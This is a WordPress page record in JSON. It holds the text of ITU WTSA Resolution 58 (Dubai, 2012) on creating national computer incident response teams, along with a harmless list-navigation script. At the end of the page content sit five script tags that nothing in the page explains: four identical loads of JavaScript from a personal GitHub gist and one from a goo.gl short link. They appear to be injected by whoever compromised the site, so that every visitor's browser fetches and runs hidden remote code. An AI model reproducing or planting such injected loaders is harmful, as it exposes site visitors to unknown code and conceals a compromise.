{"id":573,"date":"2013-05-20T11:21:49","date_gmt":"2013-05-20T15:21:49","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=573"},"modified":"2015-06-30T00:32:09","modified_gmt":"2015-06-30T04:32:09","slug":"wtsa_58","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_58\/","title":{"rendered":"WTSA Resolution 58"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTSA RESOLUTION 58 (Rev. Dubai, 2012)<\/span><\/h3>\n<h4><span style=\"\">Encouraging the creation of national computer incident response teams, particularly for developing countries<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">that Resolution 123 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference instructs the Secretary-General and the Directors of the three Bureaux to work closely with each other in pursuing initiatives that assist in bridging the standardization gap between developing and developed countries,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the highly satisfactory results obtained by the regional approach within the framework of Resolution 54 (Rev. Dubai, 2012) of this assembly;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the increasing level of computer use and computer dependency in information and communication technologies (ICT) within developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)         the increasing attacks and threat on ICT networks through computers;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the work carried out by the ITU Telecommunication Development Sector (ITU-D) under Question 22\/1 of ITU-D Study Group 1 on this subject,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that there is still a low level of computer emergency preparedness within many countries, particularly developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the high level of interconnectivity of ICT networks could be affected by the launch of an attack from networks of the less-prepared nations, which are mostly the developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        the importance of having an appropriate level of computer emergency preparedness in all countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the need for establishment of computer incident response teams (CIRTs) on a national basis and the importance of coordination within and among the regions,<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        the work of Study Group 17 of the ITU Telecommunication Standardization Sector (ITU-T) in the area of national CIRTs, particularly for developing countries, and cooperation between them, as contained in the outputs of the study group,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">bearing in mind<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">that well-functioning CIRTs in developing countries will serve to improve the level of developing countries&#8217; participation in world computer emergency response activities and contribute to achieving an effective global ICT infrastructure,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to support the creation of national CIRTs in Member States where CIRTs are needed and are currently absent,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau, in collaboration with the Director of the Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to identify best practices to establish CIRTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to identify where CIRTs are needed;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to collaborate with international experts and bodies to establish national CIRTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to provide support, as appropriate, within existing budgetary resources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to facilitate collaboration between national CIRTs, such as capacity building and exchange of information, within an appropriate framework,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to consider the creation of a national CIRT as a high priority;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to collaborate with other Member States and with Sector Members,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States and Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to cooperate closely with ITU-T and ITU-D in this regard.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 58 (Rev. Dubai, 2012) Encouraging the creation of national computer incident response teams, particularly for developing countries The World Telecommunication Standardization Assembly (Dubai, 2012), considering that Resolution 123 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference instructs the Secretary-General and the Directors of the three Bureaux to work closely with each other in pursuing [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":58,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-573","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=573"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/573\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}